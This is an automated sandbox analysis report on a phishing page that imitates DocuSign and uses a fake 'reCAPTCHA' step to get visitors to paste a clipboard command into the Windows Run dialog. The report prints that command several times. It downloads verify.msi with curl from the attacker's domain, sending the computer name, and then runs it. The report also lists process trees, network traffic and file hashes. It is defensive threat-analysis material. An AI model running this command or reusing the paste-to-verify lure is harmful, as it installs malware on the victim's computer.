
Windows Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Overview

General Information

Sample URL: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Analysis ID: 1645433

Detection

Score: 64
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
AI detected landing page (webpage, office document or email)
HTML page adds supicious text to clipboard
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body with high number of large embedded background images detected
HTML title does not match URL
Invalid T&C link found
Sample execution stops while process was sleeping (likely an evasion)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner
Verdict levels: clean, suspicious, malicious
  • System is w10x64
  • chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cmd.exe (PID: 4328 cmdline: cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6912 cmdline: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • curl.exe (PID: 6452 cmdline: curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Phishing

Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | Joe Sandbox AI: Score: 9 | Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'. The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'. The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure. The presence of 'account' as a subdomain could be an attempt to mimic legitimate login pages. The use of 'us.com' as a domain extension is unusual for a well-known brand like Docusign, which typically uses '.com'. | DOM: 0.0.pages.csv
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | Joe Sandbox AI: Score: 9 | Reasons: The brand 'Docusign' is well-known and typically associated with the domain 'docusign.com'. The URL 'account.esign.us.com' does not match the legitimate domain 'docusign.com'. The domain 'esign.us.com' is suspicious as it does not directly relate to 'Docusign' and uses a generic domain structure. The presence of 'account' as a subdomain could be an attempt to mimic legitimate account-related pages. The use of a reCAPTCHA code input field is common in phishing sites to create a false sense of security. | DOM: 0.1.pages.csv
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | Joe Sandbox AI: Page contains button: 'Submit Verification' | Source: '0.1.pages.csv'
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: Number of links: 0
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: Total embedded background img size: 248747
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: Title: Docusign - Verification does not match URL
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: Invalid link: Privacy Policy
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: Invalid link: Terms of Service
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: No <meta name="author".. found
Source: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | HTTP Parser: No <meta name="copyright".. found
Source: global traffic | HTTP traffic detected:
  GET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1
  Host: account.esign.us.com
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1
  Host: cdn.jsdelivr.net
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: text/css,*/*;q=0.1
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: style
  Sec-Fetch-Storage-Access: active
  Referer: https://account.esign.us.com/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.js HTTP/1.1
  Host: cdn.jsdelivr.net
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://account.esign.us.com/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
  GET /intl/en_us/badges/static/images/badges/en_badge_web_generic.png HTTP/1.1
  Host: play.google.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  X-Client-Data: CO6MywE=
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Referer: https://account.esign.us.com/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: account.esign.us.com
Source: global traffic | DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic | DNS traffic detected: DNS query: play.google.com
Source: global traffic | DNS traffic detected: DNS query: upload.wikimedia.org
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.esign.us.com/user-verify
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.esign.us.com/user-verify-Hx-system-id:
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.esign.us.com/user-verifys
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir1540_1298553543
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir1540_1298553543
Source: classification engine | Classification label: mal64.phis.win@29/27@18/7
Source: C:\Windows\SysWOW64\curl.exe | File created: C:\Users\user\verify.msi
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\SysWOW64\curl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
Source: Window Recorder | Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Source: Chrome DOM: 0.1 | OCR Text: Join our live webinar with Deloitte on March 19 to discover how A is revolutionizing agreement management. > Sales 1-877420-2040 Search Support Access Documents Log In docusign Solutions Products Plans & Pricing Contact Sales Resources auy Now Try For Free Enter reCAPTCHA Code Verification Steps: 1. Press + R 2. Press CTRL + V 3. Press ENTER 4. Submit reCAPTCHA result code below Enter reCAPTCHA code Submit Verification
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Clipboard modification: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -h "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo captcha code: 033561 && pause && rem docusign captcha verification tool (ver. 2025.1022)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Command and Scripting Interpreter (1); Scheduled Task/Job; At; Cron
Persistence: Browser Extensions (3); DLL Side-Loading (1); Logon Script (Windows); Login Hook
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook
Defense Evasion: Masquerading (11); Process Injection (11); DLL Side-Loading (1); File Deletion (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery (1); System Information Discovery (1); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Non-Application Layer Protocol (2); Application Layer Protocol (2); Ingress Tool Transfer (1); Protocol Impersonation
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
[Behavior graph. ID: 1645433. URL: https://account.esign.us.co... Start date: 21/03/2025. Architecture: WINDOWS. Score: 64. Processes: chrome.exe started chrome.exe; cmd.exe started cmd.exe and conhost.exe; the child cmd.exe started curl.exe. Network: chrome.exe contacted account.esign.us.com (44.203.127.19, AMAZON-AESUS, United States), upload.wikimedia.org (208.80.154.240, WIKIMEDIAUS, United States) and 6 other IPs or domains; curl.exe contacted 127.0.0.1.]

Source | Detection | Scanner | Label | Link
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | 0% | Avira URL Cloud | safe | -
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://account.esign.us.com/user-verify-Hx-system-id: | 0% | Avira URL Cloud | safe | -
https://account.esign.us.com/user-verifys | 0% | Avira URL Cloud | safe | -
https://account.esign.us.com/user-verify | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jsdelivr.map.fastly.net | 151.101.193.229 | true | false | - | high
google.com | 142.251.40.238 | true | false | - | high
play.google.com | 172.217.165.142 | true | false | - | high
www.google.com | 142.251.40.196 | true | false | - | high
upload.wikimedia.org | 208.80.154.240 | true | false | - | high
account.esign.us.com | 44.203.127.19 | true | true | - | unknown
cdn.jsdelivr.net | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js | false | - | high
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF | true | - | unknown
https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png | false | - | high
https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | chromecache_67.3.dr | false | - | high
https://account.esign.us.com/user-verify-Hx-system-id: | curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_l | chromecache_67.3.dr | false | - | high
https://account.esign.us.com/user-verify | curl.exe, 00000011.00000002.2084776832.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://account.esign.us.com/user-verifys | curl.exe, 00000011.00000002.2084776832.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.jsdelivr.net/npm/sweetalert2 | chromecache_67.3.dr | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
151.101.193.229 | jsdelivr.map.fastly.net | United States | 54113 | FASTLYUS | false
208.80.154.240 | upload.wikimedia.org | United States | 14907 | WIKIMEDIAUS | false
44.203.127.19 | account.esign.us.com | United States | 14618 | AMAZON-AESUS | true
142.251.40.142 | unknown | United States | 15169 | GOOGLEUS | false
142.251.40.196 | www.google.com | United States | 15169 | GOOGLEUS | false
172.217.165.142 | play.google.com | United States | 15169 | GOOGLEUS | false
IP
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1645433
Start date and time: 2025-03-21 18:43:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.phis.win@29/27@18/7
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Time | Type | Description
18:44:42 | Clipboard | Run: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
Process: C:\Windows\SysWOW64\curl.exe
File Type: Composite Document File V2 Document, Can't read SAT
Category: dropped
Size (bytes): 10055680
Entropy (8bit): 7.99703770777142
Encrypted: true
SSDEEP: 196608:1wCYGozqoC3sktVQC6WGwW3YziyfzrvHWrHMJ/ZnznFE5xlNhsVm:1UDAvtCC6FlByfXvHWEZnzqZ
MD5: F35E55AB0B13D00D1237F09D2BC603DD
SHA1: D31368479E8E632DA929F2E385B6A31FFFA5B507
SHA-256: 4DF441E0A284601615217184DC64FCF9427E659F534FFA6228BBBA152CEA4274
SHA-512: 566B3C3733D396AC572A48A28059CC4FAF6169CBDEF82CA67A6A736C622D3C7988C395610D9CB4B087EB87978250ABA3707F1A0B32C258234E05591B715CA282
Malicious: false
Reputation: low
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format (Version 2), TrueType, length 24368, version 1.0
                              Category:downloaded
                              Size (bytes):24368
                              Entropy (8bit):7.990776494170634
                              Encrypted:true
                              SSDEEP:384:dg3hlifU7dYMasNHvcIxoRqrYcyKRjpt2PJKYytsPLFOYYmHRlkaSsD:YqsdxxhcIxo8rPyKJpt6nyaPwtOR2aVD
                              MD5:42B95430773B4A1DEDFCFDA8C03A1D4B
                              SHA1:8581FACE3A3703B4807AA2440E5354EA55A6C4EE
                              SHA-256:B0E7558F4710A1E255B93E3DEEFE3AEBB19F3BB41C150F685A74D3B1A1C79E87
                              SHA-512:590E1E4DCA67CB9088844530EFF20725270421A6C521FC05CF09948DF81AB6DBB0A169F42B58B031AD888F0E7ED863A0221B9243BF2B502E805B82DDCCEE9573
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):569
                              Entropy (8bit):4.9023364401407115
                              Encrypted:false
                              SSDEEP:12:Uc11FP/sO6ZRoT6pHAcigkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKugXYmOOk4TfenEPCD
                              MD5:D90D7948B5841876B51C2D3D1FA7DF26
                              SHA1:EA1B1FCEF5C8D9C1AEB5A27FB69B195CBC3F0A69
                              SHA-256:CC0BC2CBACA383E1600D349E580513F188E4D745BF269B63FFAFF46A091FD196
                              SHA-512:A2A131E36F8E0BE7015BF22C6FA6F5EA2FCF817EB5E11287CE3BA6274674F2AF3873B0265C8959BA915C05E2BEA4E4F7CF4590135213208CAB84130C6C607A9C
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.googleapis.com/icon?family=Material+Icons
                              Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):2591
                              Entropy (8bit):5.551944904436444
                              Encrypted:false
                              SSDEEP:48:ejOXaVujOXak8FZjjOXamjOXakj43rjOXadNjOXaUJc+uXjOXaYN0xD:aOXaVqOXak8FZHOXaiOXah3vOXa7OXan
                              MD5:955A06E42819BE6A6D372B7C77E38E15
                              SHA1:843A09FE443606A6C6E0476C85F56E38F6979715
                              SHA-256:A221060E887590FCA4A80048400D6FC61883803F27CF2266920C0B8A16C03D6C
                              SHA-512:35F9A2383A890C955D24C609BCBDDD11F76574C08DF018FA2DE246C21889EEEA7D918E72ED7E4958F3D862F0196A89D1AA2096B45965B434F89D9A12EEB79165
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.googleapis.com/css2?family=Inter:wght@500&display=swap
                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZJhiI2B.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZthiI2B.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZNhiI2B.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter';. font-sty
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):10804
                              Entropy (8bit):4.481624126994836
                              Encrypted:false
                              SSDEEP:192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U
                              MD5:2928664FE1FC6ACA88583A6F606D60BA
                              SHA1:2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993
                              SHA-256:A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F
                              SHA-512:7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347
                              Malicious:false
                              Reputation:low
                              Preview:<svg id="livetype" xmlns="http://www.w3.org/2000/svg" width="119.66407" height="40" viewBox="0 0 119.66407 40">. <title>Download_on_the_App_Store_Badge_US-UK_RGB_blk_4SVG_092917</title>. <g>. <g>. <g>. <path d="M110.13477,0H9.53468c-.3667,0-.729,0-1.09473.002-.30615.002-.60986.00781-.91895.0127A13.21476,13.21476,0,0,0,5.5171.19141a6.66509,6.66509,0,0,0-1.90088.627A6.43779,6.43779,0,0,0,1.99757,1.99707,6.25844,6.25844,0,0,0,.81935,3.61816a6.60119,6.60119,0,0,0-.625,1.90332,12.993,12.993,0,0,0-.1792,2.002C.00587,7.83008.00489,8.1377,0,8.44434V31.5586c.00489.3105.00587.6113.01515.9219a12.99232,12.99232,0,0,0,.1792,2.0019,6.58756,6.58756,0,0,0,.625,1.9043A6.20778,6.20778,0,0,0,1.99757,38.001a6.27445,6.27445,0,0,0,1.61865,1.1787,6.70082,6.70082,0,0,0,1.90088.6308,13.45514,13.45514,0,0,0,2.0039.1768c.30909.0068.6128.0107.91895.0107C8.80567,40,9.168,40,9.53468,40H110.13477c.3594,0,.7246,0,1.084-.002.3047,0,.6172-.0039.9219-.0107a13.279,13.279,0,0,0,2-.1768,6.80432,6.80432,0,0
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:downloaded
                              Size (bytes):10804
                              Entropy (8bit):4.481624126994836
                              Encrypted:false
                              SSDEEP:192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U
                              MD5:2928664FE1FC6ACA88583A6F606D60BA
                              SHA1:2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993
                              SHA-256:A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F
                              SHA-512:7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347
                              Malicious:false
                              Reputation:low
                              URL:https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg
                              Preview:<svg id="livetype" xmlns="http://www.w3.org/2000/svg" width="119.66407" height="40" viewBox="0 0 119.66407 40">. <title>Download_on_the_App_Store_Badge_US-UK_RGB_blk_4SVG_092917</title>. <g>. <g>. <g>. <path d="M110.13477,0H9.53468c-.3667,0-.729,0-1.09473.002-.30615.002-.60986.00781-.91895.0127A13.21476,13.21476,0,0,0,5.5171.19141a6.66509,6.66509,0,0,0-1.90088.627A6.43779,6.43779,0,0,0,1.99757,1.99707,6.25844,6.25844,0,0,0,.81935,3.61816a6.60119,6.60119,0,0,0-.625,1.90332,12.993,12.993,0,0,0-.1792,2.002C.00587,7.83008.00489,8.1377,0,8.44434V31.5586c.00489.3105.00587.6113.01515.9219a12.99232,12.99232,0,0,0,.1792,2.0019,6.58756,6.58756,0,0,0,.625,1.9043A6.20778,6.20778,0,0,0,1.99757,38.001a6.27445,6.27445,0,0,0,1.61865,1.1787,6.70082,6.70082,0,0,0,1.90088.6308,13.45514,13.45514,0,0,0,2.0039.1768c.30909.0068.6128.0107.91895.0107C8.80567,40,9.168,40,9.53468,40H110.13477c.3594,0,.7246,0,1.084-.002.3047,0,.6172-.0039.9219-.0107a13.279,13.279,0,0,0,2-.1768,6.80432,6.80432,0,0
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):2228
                              Entropy (8bit):7.82817506159911
                              Encrypted:false
                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                              MD5:EF9941290C50CD3866E2BA6B793F010D
                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                              Malicious:false
                              Reputation:low
                              URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (43748), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):287196
                              Entropy (8bit):6.0648318979601905
                              Encrypted:false
                              SSDEEP:6144:7v0J0Yd5lHI38+QPbll7ga3ZYThRK5+VcJ/dg7qp:7vkvn9ISzll7FKhRjkf
                              MD5:C6E864E56E1CF59CC4CC22FAAD40F116
                              SHA1:6FC3B18767E861A496157D6EDFF783EAC2C44516
                              SHA-256:CA9B4FE3468E648B04F9FC8957285A1205C76E8883EE2D2950CBE4235E896B27
